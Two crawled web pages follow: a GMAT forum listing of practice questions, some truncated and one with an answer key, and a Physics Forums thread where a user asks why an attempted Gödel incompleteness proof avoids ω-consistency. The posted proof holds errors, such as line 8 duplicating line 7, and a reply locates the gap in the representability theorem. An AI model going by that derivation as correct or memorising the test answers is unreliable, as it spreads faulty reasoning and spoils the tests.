Sun Sep 19, 2021 12:59 pm Forum: Data Sufficiency Topic: What is the average (arithmetic mean) of eleven consecutive integers? Replies: 1 Views: 11 #### If the terms of a sequence are $$t_1, t_2, t_3, \ldots, t_n,$$ what is the value of $$n?$$ ##### If the terms of a sequence are $$t_1, t_2, t_3, \ldots, t_n,$$ what is the value of $$n?$$ If the terms of a sequence are $$t_1, t_2, t_3, \ldots, t_n,$$ what is the value of $$n?$$ (1) The sum of the $$n$$ terms is $$3,124.$$ (2) The average (arithmetic mean) of the $$n$$ terms is $$4.$$ Source: GMAT Prep #### A bus made a roundtrip journey from Madison towards Chicago, which is 240 km away. In the onward journey, the bus divide ##### A bus made a roundtrip journey from Madison towards Chicago, which is 240 km away. In the onward journey, the bus divide A bus made a roundtrip journey from Madison towards Chicago, which is 240 km away. In the onward journey, the bus divided the journey time into 3 equal blocks. Started at 50 kph, it took stoppages after every block and increased its speed by 10 kph after every stoppage. At Chicago, it took a halt of... #### If $$r$$ and $$s$$ are positive integers, can the fraction $$\dfrac{r}{s}$$ be expressed as a decimal with only a finite ##### If $$r$$ and $$s$$ are positive integers, can the fraction $$\dfrac{r}{s}$$ be expressed as a decimal with only a finite If $$r$$ and $$s$$ are positive integers, can the fraction $$\dfrac{r}{s}$$ be expressed as a decimal with only a finite number of nonzero digits? (1) $$s$$ is a factor of $$100.$$ (2) $$r$$ is a factor of $$100.$$ Source: Official Guide #### If $$x < y,$$ which of the following must be true? ##### If $$x < y,$$ which of the following must be true? If $$x < y,$$ which of the following must be true? (A) $$x < y^2$$ (B) $$x^2 < y$$ (C) $$x^2 < y^2$$ (D) $$(x - y)^2 > 0$$ (E) $$x^3 > y$$ Source: Manhattan GMAT by Gmat_mission Sun Sep 19, 2021 12:39 pm Forum: Problem Solving Topic: If $$x < y,$$ which of the following must be true? Replies: 0 Views: 15 #### Is it true that $$x > 0?$$ ##### Is it true that $$x > 0?$$ Is it true that $$x > 0?$$ (1) $$x^2 = 2x$$ (2) $$x^3 = 3x$$ Source: GMAT Prep by Gmat_mission Sun Sep 19, 2021 12:37 pm Forum: Data Sufficiency Topic: Is it true that $$x > 0?$$ Replies: 1 Views: 14 #### $$x$$ is an integer and $$x$$ raised to any odd integer is greater than zero; is $$w - z$$ greater than $$5$$ times the ##### $$x$$ is an integer and $$x$$ raised to any odd integer is greater than zero; is $$w - z$$ greater than $$5$$ times the $$x$$ is an integer and $$x$$ raised to any odd integer is greater than zero; is $$w - z$$ greater than $$5$$ times the quantity $$7^{x-1}-5^x?$$ (1) $$z < 25$$ and $$w=7^x$$ (2) $$x = 4$$ Source: Official Guide #### Committee $$X$$ has $$4$$ members, committee $$Y$$ has $$5$$ members, and these committees have no members in common. If ##### Committee $$X$$ has $$4$$ members, committee $$Y$$ has $$5$$ members, and these committees have no members in common. If Committee $$X$$ has $$4$$ members, committee $$Y$$ has $$5$$ members, and these committees have no members in common. If a task force is to be formed consisting of one member of $$X$$ and one member of $$Y,$$ how many different task forces are possible? A) 6 B) 9 C) 10 D) 20 E) 36 Answer: D Source: ... #### In the figure above, if the area of triangular region $$D$$ is $$4,$$ what is the length of a side of square region ##### In the figure above, if the area of triangular region $$D$$ is $$4,$$ what is the length of a side of square region In the figure above, if the area of triangular region $$D$$ is $$4,$$ what is the length of a side of square region $$A?$$ (1) The area of square region $$B$$ is $$9.$$ (2) The area of square region $$C$$ is $$\dfrac{64}9.$$ #### A committee is composed of $$w$$ women and $$m$$ men. If $$3$$ women and $$2$$ men are added to the committee, and if on ##### A committee is composed of $$w$$ women and $$m$$ men. If $$3$$ women and $$2$$ men are added to the committee, and if on A committee is composed of $$w$$ women and $$m$$ men. If $$3$$ women and $$2$$ men are added to the committee, and if one person is selected at random from the enlarged committee, then the probability that a woman is selected can be represented by (A) $$\dfrac{w}{m}$$ (B) $$\dfrac{w}{w+m}$$ (C) \(\d...
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.4387013912200928, "perplexity": 635.8495049948218}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-39/segments/1631780057416.67/warc/CC-MAIN-20210923013955-20210923043955-00097.warc.gz"}
https://www.physicsforums.com/threads/proof-of-godels-1st-theorem-missing-o-consistency-requirement-whats-wrong.647039/
Proof of Godel's 1st Theorem missing ω-consistency requirement. What's wrong? 1. Oct 25, 2012 andrewkirk Below is a proof of one of the key steps in Godel's first incompleteness theorem. It appears to prove the theorem. However, it doesn't assume that T⋃Q is ω-consistent, which I have read is necessary for the proof to work. The alternative is to use Rosser's Trick to avoid needing to assume ω-consistency. But the proof doesn't do that either. This leads me to believe that my proof must have an invalid step in it, that requires ω-consistency to validate it. But I cannot see where that would be required. That's probably because my grasp of the concept of ω-consistency is very new and very tenuous. I think my omission is probably in the part of the proof I've laid out in detail below. But it's possible that it lies somewhere else, like in the Representability Theorem or the couple of steps at the end. If anybody can help me identify where I have gone wrong, I would appreciate it. Strong Undecidability of Q For a collection S of sentences in formal language L, define: Cn(S) = {#(θ) : Sentence(θ) ⋀ (S⊢ θ)} where #(F) denotes the Godel number of formula F and Sentence(ψ) means that ψ is a well-formed sentence in L. The strong undecidability of Q theorem states that for any L-theory T, if T⋃Q is consistent in L, then T is undecidable, by which we mean that Cn(T) is not recursive. Here Q denotes Robinson Arithmetic. Proof Assume T⋃Q is consistent in L and Cn(T⋃Q) is recursive (meaning that the relation that defines it as a subset of ω is recursive, aka μ-recursive). Because of the recursivity of Cn(T⋃Q), the Representability Theorem tells us that the relation it defines must be representable in Q, which means there must exist a formula BewT⋃Q in wff(LN) with one free variable, say c, such that, for any θ in wff(LN): A. (#(θ)∈Cn(T⋃Q)) ⇒ (Q⊢BewT⋃Q[c:=#(θ)] and B. (#(θ)∉Cn(T⋃Q)) ⇒ (Q⊢¬BewT⋃Q[c:=#(θ)]). Bew is short for the German word beweisbar, meaning provable. Note that representability of Cn(T⋃Q) is a bigger requirement than it might at first seem, as any wff must have finite length and, since both sets Cn(T⋃Q) and ω - Cn(T⋃Q) are infinite, this precludes BewT⋃Q from being a simple infinite list of all numbers in Cn(T⋃Q). BewT⋃Q doesn't have to be recursive, but it must be concise. Now by the Diagonal Lemma, applied to the wff (¬BewT⋃Q), we know there exists a sentence G in wff(LN) such that: 1. Q ⊢ (G↔¬BewT⋃Q[c:=#(G)]) This appears to be a theorem saying that G is true in T iff it is not provable in T, which immediately arouses suspicion. Let us examine this formally: 2. T ⊢G [Hypothesis] 3. #(G)∈Cn(T) [from previous line, by definition of Cn(T)] 4. #(G)∈Cn(T⋃Q) [as Cn(T)⊂Cn(T⋃Q)] 5. Q ⊢BewT⋃Q[c:=#(G)]) [from A. above] 6. Q ⊢¬G [from lines 1 and 5, via Modus Ponens] 7. T⋃Q ⊢¬G [as Q⊂T⋃Q] 8. T⋃Q ⊢¬G [from line 2, as Q⊂T⋃Q] Hence T⋃Q⊢(G→(G⋀¬G)), so if T⋃Q is consistent, we must have: 9. T⋃Q⊬G However it then follows that: 10. #(G)∉Cn(T⋃Q) [from previous line, by definition of Cn(T⋃Q)] 11. Q ⊢¬BewT⋃Q[c:=#(G)] [from B. above] 12. Q ⊢G [by lines 1 and 11, via Modus Ponens] 13. T⋃Q ⊢G [from previous line, as Q⊂T⋃Q] So we have (T⋃Q⊢G)⋀¬(T⋃Q⊢G), which is a contradiction outside T. Hence we must conclude that one of the assumptions we have made is false. If we insist on retaining the assumption of consistency then the only other available assumption is the one that Cn(T⋃Q) is recursive, so we must reject that assumption. A bit more argument, which I've omitted here, shows that if Cn(T⋃Q) is not recursive then neither is Cn(T). That means that T is undecidable and if we assume T is axiomatisable then it follows that T is not complete. 2. Oct 26, 2012 Preno Maybe it would be easier if you just put your questions concerning the proof of Godel's theorem in a single thread? Anyway, Rosser's trick is used in the proof of the Representability Theorem. Without Rosser's trick, you would get the Representability Theorem in the following form: #(θ)∈Cn(T⋃Q)) ⇒ (Q⊢BewT⋃Q[c:=#(θ)] #(θ)∉Cn(T⋃Q)) ⇒ ¬ (Q⊢BewT⋃Q[c:=#(θ)] rather than in the form that you use: #(θ)∈Cn(T⋃Q)) ⇒ (Q⊢BewT⋃Q[c:=#(θ)] #(θ)∉Cn(T⋃Q)) ⇒ (Q⊢¬BewT⋃Q[c:=#(θ)] 3. Oct 27, 2012 andrewkirk Thanks Preno. I thought it might be in the Representability Theorem. I'll go and work through the version of the proof of that that I have, now, to see if I can find where either omega-consistency is used or Rosser's Trick is built in. If I have more questions I'll just start a thread called "Questions about Godel's Incompleteness Theorem" and put them there. I'd rename this thread to that but the OP is already locked. They lock posts quickly around here.
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9604184627532959, "perplexity": 1488.2434374576858}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-39/segments/1537267160754.91/warc/CC-MAIN-20180924205029-20180924225429-00099.warc.gz"}